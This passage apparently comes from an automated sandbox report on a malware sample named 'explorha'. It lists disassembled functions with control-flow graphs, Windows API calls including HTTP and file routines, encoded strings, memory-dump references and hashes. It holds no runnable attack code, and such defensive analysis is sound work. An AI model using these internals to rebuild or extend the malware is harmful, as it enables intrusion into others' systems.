                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$Close$FileHandle$OpenRead$HttpRequest$ChangeConnectCreateFindNotificationSendWrite
                                                                                                      • String ID: 4AJS7teoFA==$4AJS7xCZFC =$Nx1LPq==
                                                                                                      • API String ID: 2953698585-3681961738
                                                                                                      • Opcode ID: d7e0e7c75681c9af51cfbfac4847a1c32194fbafa574c76cbcfde23bc9e13eda
                                                                                                      • Instruction ID: 274a5801e222fc93967ddaf13ba1a9e996d6d40d1ca47ba0a3a120618f1b1a56
                                                                                                      • Opcode Fuzzy Hash: d7e0e7c75681c9af51cfbfac4847a1c32194fbafa574c76cbcfde23bc9e13eda
                                                                                                      • Instruction Fuzzy Hash: 3D721471A001089BEF18DF68CC85BEEBB75FF45314F508158E819EB296DB359AC0CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008A30DC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2538 8a30dc-8a310c call 8a2e2a 2541 8a310e-8a3119 call 898b90 2538->2541 2542 8a3127-8a3133 call 89d46b 2538->2542 2549 8a311b-8a3122 call 898ba3 2541->2549 2547 8a314c-8a3195 call 8a2d95 2542->2547 2548 8a3135-8a314a call 898b90 call 898ba3 2542->2548 2557 8a3202-8a320b GetFileType 2547->2557 2558 8a3197-8a31a0 2547->2558 2548->2549 2559 8a3401-8a3405 2549->2559 2560 8a320d-8a323e call 898b6d 2557->2560 2561 8a3254-8a3257 2557->2561 2563 8a31a2-8a31a6 2558->2563 2564 8a31d7-8a31fd call 898b6d 2558->2564 2560->2549 2586 8a3244-8a324f call 898ba3 2560->2586 2566 8a3259-8a325e 2561->2566 2567 8a3260-8a3266 2561->2567 2563->2564 2565 8a31a8-8a31d5 call 8a2d95 2563->2565 2564->2549 2565->2557 2565->2564 2568 8a326a-8a32b8 call 89d3b6 2566->2568 2567->2568 2569 8a3268 2567->2569 2580 8a32ba-8a32c6 call 8a2fa4 2568->2580 2581 8a32d7-8a32ff call 8a2b42 2568->2581 2569->2568 2580->2581 2588 8a32c8 2580->2588 2590 8a3301-8a3302 2581->2590 2591 8a3304-8a3345 2581->2591 2586->2549 2594 8a32ca-8a32d2 call 89c568 2588->2594 2590->2594 2592 8a3366-8a3374 2591->2592 2593 8a3347-8a334b 2591->2593 2597 8a337a-8a337e 2592->2597 2598 8a33ff 2592->2598 2593->2592 2596 8a334d-8a3361 2593->2596 2594->2559 2596->2592 2597->2598 2600 8a3380-8a33b3 call 8a2d95 2597->2600 2598->2559 2605 8a33e7-8a33fb 2600->2605 2606 8a33b5-8a33e1 call 898b6d call 89d57e 2600->2606 2605->2598 2606->2605
                                                                                                      APIs
                                                                                                        • Part of subcall function 008A2D95: CreateFileW.KERNELBASE(00000000,00000000,?,008A3185,?,?,00000000,?,008A3185,00000000,0000000C), ref: 008A2DB2
                                                                                                      • __dosmaperr.LIBCMT ref: 008A31F7
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 008A3203
                                                                                                      • __dosmaperr.LIBCMT ref: 008A3216
                                                                                                      • __dosmaperr.LIBCMT ref: 008A33BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __dosmaperr$File$CreateType
                                                                                                      • String ID: H
                                                                                                      • API String ID: 3443242726-2852464175
                                                                                                      • Opcode ID: f87c33a203a049c5144d27553e109c06d344d9cf333486228f0bf7a4f7d4e3ad
                                                                                                      • Instruction ID: c3feecb52edda2cfe2f34b7bcb74a2d8603f76f7c6d991e4b3c4c8ca55c619fe
                                                                                                      • Opcode Fuzzy Hash: f87c33a203a049c5144d27553e109c06d344d9cf333486228f0bf7a4f7d4e3ad
                                                                                                      • Instruction Fuzzy Hash: 8CA10532A141499FDF19AF6CD892BAD3BA1FB47324F18015DF811EB291CB359A12CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008678B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2612 8678b0-867932 call 895780 2616 867e1a-867e37 call 87e681 2612->2616 2617 867938-867960 call 879090 call 865d40 2612->2617 2624 867964-867986 call 879090 call 865d40 2617->2624 2625 867962 2617->2625 2630 86798a-8679a3 2624->2630 2631 867988 2624->2631 2625->2624 2634 8679d4-8679ff 2630->2634 2635 8679a5-8679b4 2630->2635 2631->2630 2636 867a30-867a51 2634->2636 2637 867a01-867a10 2634->2637 2638 8679b6-8679c4 2635->2638 2639 8679ca-8679d1 call 87ecf8 2635->2639 2643 867a57-867a5c 2636->2643 2644 867a53-867a55 GetNativeSystemInfo 2636->2644 2641 867a26-867a2d call 87ecf8 2637->2641 2642 867a12-867a20 2637->2642 2638->2639 2645 867e38 call 8982fa 2638->2645 2639->2634 2641->2636 2642->2641 2642->2645 2649 867a5d-867a66 2643->2649 2644->2649 2650 867e3d-867e42 call 8982fa 2645->2650 2653 867a84-867a87 2649->2653 2654 867a68-867a6f 2649->2654 2655 867a8d-867a96 2653->2655 2656 867dbb-867dbe 2653->2656 2658 867e15 2654->2658 2659 867a75-867a7f 2654->2659 2661 867a98-867aa4 2655->2661 2662 867aa9-867aac 2655->2662 2656->2658 2663 867dc0-867dc9 2656->2663 2658->2616 2660 867e10 2659->2660 2660->2658 2661->2660 2665 867ab2-867ab9 2662->2665 2666 867d98-867d9a 2662->2666 2667 867df0-867df3 2663->2667 2668 867dcb-867dcf 2663->2668 2669 867b94-867d81 call 879090 call 865d40 call 879090 call 865d40 call 865e90 call 879090 call 865d40 call 865860 call 879090 call 865d40 call 879090 call 865d40 call 865e90 call 879090 call 865d40 call 865860 call 879090 call 865d40 call 879090 call 865d40 call 865e90 call 879090 call 865d40 call 865860 2665->2669 2670 867abf-867b16 call 879090 call 865d40 call 879090 call 865d40 call 865e90 2665->2670 2675 867d9c-867da6 2666->2675 2676 867da8-867dab 2666->2676 2673 867df5-867dff 2667->2673 2674 867e01-867e0d 2667->2674 2671 867de4-867dee 2668->2671 2672 867dd1-867dd6 2668->2672 2711 867d87-867d90 2669->2711 2698 867b1b-867b22 2670->2698 2671->2658 2672->2671 2679 867dd8-867de2 2672->2679 2673->2658 2674->2660 2675->2660 2676->2658 2677 867dad-867db9 2676->2677 2677->2660 2679->2658 2699 867b26-867b46 call 89a1e1 2698->2699 2700 867b24 2698->2700 2706 867b7d-867b7f 2699->2706 2707 867b48-867b57 2699->2707 2700->2699 2706->2711 2712 867b85-867b8f 2706->2712 2709 867b6d-867b7a call 87ecf8 2707->2709 2710 867b59-867b67 2707->2710 2709->2706 2710->2650 2710->2709 2711->2656 2716 867d92 2711->2716 2712->2711 2716->2666
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00867A53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID: FcspH7==$FcspIG==$FcsqG7==
                                                                                                      • API String ID: 1721193555-2365427954
                                                                                                      • Opcode ID: 3a1298287b0db4f73d5584cbfbafe0a846c908ae459f83bf352bc8a1afb46121
                                                                                                      • Instruction ID: 5c23e544c6dac9b6aed45f45f36ee09c614b68f3fa41a80d41755d50ae221a7b
                                                                                                      • Opcode Fuzzy Hash: 3a1298287b0db4f73d5584cbfbafe0a846c908ae459f83bf352bc8a1afb46121
                                                                                                      • Instruction Fuzzy Hash: 16D10371E006149BDB14BB68DC567AE7B71FB51328F914298E419EB3C2DB358E848BC3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00898561 Relevance: 4.6, APIs: 3, Instructions: 145COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2829 898561-898596 GetFileType 2830 89859c-8985a7 2829->2830 2831 89864e-898651 2829->2831 2832 8985c9-8985e5 call 895780 GetFileInformationByHandle 2830->2832 2833 8985a9-8985ba call 8988d7 2830->2833 2834 89867a-8986a2 2831->2834 2835 898653-898656 2831->2835 2842 89866b-898678 call 898b6d 2832->2842 2847 8985eb-89862d call 898829 call 8986d1 * 3 2832->2847 2850 8985c0-8985c7 2833->2850 2851 898667-898669 2833->2851 2836 8986bf-8986c1 2834->2836 2837 8986a4-8986b7 2834->2837 2835->2834 2840 898658-89865a 2835->2840 2845 8986c2-8986d0 call 87e681 2836->2845 2837->2836 2856 8986b9-8986bc 2837->2856 2840->2842 2843 89865c-898661 call 898ba3 2840->2843 2842->2851 2843->2851 2865 898632-89864a call 8987f6 2847->2865 2850->2832 2851->2845 2856->2836 2865->2836 2868 89864c 2865->2868 2868->2851
                                                                                                      APIs
                                                                                                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00898583
                                                                                                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 008985DD
                                                                                                      • __dosmaperr.LIBCMT ref: 00898672
                                                                                                        • Part of subcall function 008988D7: __dosmaperr.LIBCMT ref: 0089890C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File__dosmaperr$HandleInformationType
                                                                                                      • String ID:
                                                                                                      • API String ID: 2531987475-0
                                                                                                      • Opcode ID: ed7c28c574cab085be8e18251a440ca91dad7bd96f8d714bdc24899eb99c9e31
                                                                                                      • Instruction ID: 3a8a8b9dc125f7de240d18893fa9fb8f14e2f6151dae470ec59b3bbf1df36699
                                                                                                      • Opcode Fuzzy Hash: ed7c28c574cab085be8e18251a440ca91dad7bd96f8d714bdc24899eb99c9e31
                                                                                                      • Instruction Fuzzy Hash: F2415B71900649EFDF25AFA5DC459ABB7F9FF9A300B184529F456D7610EB309800CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00865E90 Relevance: 4.6, APIs: 3, Instructions: 134registryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
